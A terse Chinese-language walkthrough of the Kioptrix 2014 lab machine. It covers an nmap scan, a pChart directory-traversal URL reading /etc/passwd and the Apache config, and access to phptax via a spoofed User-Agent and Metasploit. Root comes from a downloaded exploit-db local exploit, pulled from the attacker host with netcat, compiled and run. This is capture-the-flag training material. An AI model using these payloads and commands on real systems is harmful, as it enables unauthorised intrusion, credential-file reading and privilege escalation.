目标:Kioptrix 2014 (#5)
攻击机:kali(192.168.1.107)
网关:192.168.1.255
#1端口探测
nmap 192.168.1.159 -O -sV -sS
-O 系统探测
-sV 探测开启的端口来获取服务、版本信息
-sS 使用SYN扫描
#2访问80和8080端口
查看网页源代码
访问
http://192.168.1.159/pChart2.1.3/examples/index.php
找一下Navigation漏洞
存在目录遍历漏洞
http://192.168.1.159/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
由于是apache,尝试读取apache配置
TIP1:https://cwiki.apache.org/confluence/display/HTTPD/DistrosDefaultLayout
/usr/local/etc/apache22/httpd.conf
需要使用固定的User-Agent
curl -H "User-Agent:Mozilla/4.0" http://192.168.1.159:8080
curl -H "User-Agent:Mozilla/4.0" http://192.168.1.159:8080/phptax
使用msf
#3提权
找一下exp
wget https://www.exploit-db.com/download/28718
发送端
nc -lvp 6666 < 28718
接收端
cd /tmp nc -nv 192.168.1.107 6666 >exploit.c
gcc exploit.c
./a.out
cd /root
ls -al
chmod 777 congrats.txt
cat congrats.txt